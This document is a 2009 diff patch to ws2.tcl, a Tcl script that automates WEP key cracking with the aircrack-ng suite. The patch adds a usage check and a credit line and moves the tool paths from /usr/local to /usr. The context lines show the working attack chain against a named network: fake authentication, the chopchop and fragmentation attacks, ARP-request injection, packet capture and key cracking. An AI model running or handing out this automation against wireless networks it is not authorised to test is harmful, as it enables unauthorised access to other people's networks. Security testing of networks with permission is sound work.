--- ws2.tcl.orig	2009-05-28 21:19:20.000000000 +0200
+++ ws2.tcl	2009-05-28 21:29:39.000000000 +0200
@@ -2,6 +2,7 @@
 #
 # Based upon by GM
 # Last modified by Jano, compatible with Aircack-ng-rc3
+# Some cleanups by jens@chaox.net
 # ... Enjoy ;)
 
 #################################################################
@@ -14,6 +15,8 @@
 # Note for use --> sudo ./ws2.tcl Essid Iface Channel #
 #######################################################
 
+set usagemsg {ws2 essid iface channel}
+if {[llength $argv] != 3} {puts stderr $usagemsg; exit}
 set essid "\"[join [lrange [split $argv] 0 end-2]]\""
 set iface [lindex [split $argv] end-1]
 set channel [lindex [split $argv] end]
@@ -30,7 +33,7 @@
 }
 
 proc do_auth {essid iface} {	
-	set assoc [open "|/usr/local/sbin/aireplay-ng -1 600 -e $essid $iface"]
+	set assoc [open "|/usr/sbin/aireplay-ng -1 600 -e $essid $iface"]
 	return [unblock $assoc]
 }
 
@@ -51,13 +54,13 @@
 
 proc do_chop {essid iface} {
 	puts "Running chopchop attack..."
-	set chop [open "|/usr/local/sbin/aireplay-ng -4 -F -h $::hmac -e $essid $iface" r+]
+	set chop [open "|/usr/sbin/aireplay-ng -4 -F -h $::hmac -e $essid $iface" r+]
 	return [unblock $chop]
 }
 
 proc do_frag {essid iface} {
 	puts "Running fragmentation attack..."
-	set frag [open "|/usr/local/sbin/aireplay-ng -5 -F -e $essid $iface" r+]
+	set frag [open "|/usr/sbin/aireplay-ng -5 -F -e $essid $iface" r+]
 	return [unblock $frag]
 }
 
@@ -79,13 +82,13 @@
 }
 
 proc do_inj {iface essid} {
-	set inj [open "|/usr/local/sbin/aireplay-ng -3 -r arp-request -e $essid -F $iface"]
+	set inj [open "|/usr/sbin/aireplay-ng -3 -r arp-request -e $essid -F $iface"]
 	puts "Injecting generated packet..."
 	return [unblock $inj]
 }
 
 proc do_arpinj {iface essid} {
-	set inj [open "|/usr/local/sbin/aireplay-ng -3 -e $essid -F $iface -x 700"]
+	set inj [open "|/usr/sbin/aireplay-ng -3 -e $essid -F $iface -x 700"]
 	puts "Listening for ARP packets..."
 	return [unblock $inj]
 }
@@ -107,14 +110,14 @@
 
 proc do_dump {iface chan} {
 	puts "Packet capture started."
-	set aero [open "|/usr/local/sbin/airodump-ng --channel $chan -w temp $iface"]
+	set aero [open "|/usr/sbin/airodump-ng --channel $chan -w temp $iface"]
 	return [unblock $aero]
 }
 
 proc do_crack {essid} {
 	puts "Starting crack..."
 	after 500
-	set ac [open "|/usr/local/bin/aircrack-ng -z -q -e $essid -b $::bmac [pwd]/temp-01.cap"]
+	set ac [open "|/usr/bin/aircrack-ng -z -q -e $essid -b $::bmac [pwd]/temp-01.cap"]
 	return [unblock $ac]
 }
 
